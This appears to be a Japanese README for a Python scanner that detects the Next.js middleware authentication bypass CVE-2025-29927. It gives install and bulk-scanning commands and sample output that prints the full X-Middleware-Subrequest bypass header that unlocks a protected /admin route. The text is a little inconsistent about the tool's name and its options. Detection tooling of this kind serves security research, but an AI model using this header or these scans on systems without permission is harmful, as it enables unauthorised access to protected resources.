
Next.js ミドルウェアバイパススキャナー
CVE-2025-29927は、Next.jsバージョン11.1.4から15.2.2に影響するNext.jsミドルウェアバイパス脆弱性(CVE-2025-29927)を検出するための専門的なセキュリティツールです。この重大な脆弱性により、攻撃者は特別に細工されたHTTPヘッダーを送信することでセキュリティ制御をバイパスできます。
Next.jsミドルウェアバイパス脆弱性(CVE-2025-29927)により、攻撃者はミドルウェア処理ロジックを混乱させる悪意のあるX-Middleware-Subrequestヘッダーを送信することで認証制御を回避できます。これにより、保護されたリソースやルートへの不正アクセスが可能になります。
CVSSスコア: 9.1 (Critical)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: スキャン対象の単一ターゲット(例: example.com または https://example.com)-f, --file: ターゲットリストを含むファイル(1行に1つ)-c, --concurrency: 同時スキャン数(デフォルト: 5)-k, --insecure: SSL証明書検証を無効にする(IPアドレスに有用)-s, --silent: サイレントモード - 脆弱なターゲットのみ表示単一ターゲットのスキャン:
python CVE-2025-29927.py -t example.com
ファイルから複数ターゲットをスキャン:
python CVE-2025-29927.py -f targets.txt
SSL検証を無効にしてスキャン:
python CVE-2025-29927.py -t 192.168.1.1 -k
サイレントモードでの自動スキャン:
python CVE-2025-29927.py -f targets.txt -k -s
カスタムヘッダーでのスキャン:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
脆弱なターゲットに対して、MiddleWayは以下を表示します:
出力例:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
この脆弱性を緩和するには:
X-Middleware-Subrequestヘッダーをブロックするこのツールは、セキュリティ研究および防御目的でのみ提供されています。所有していないシステムをスキャンする前に、必ず適切な許可を取得してください。作成者は、このツールの誤用について一切の責任を負いません。
MIT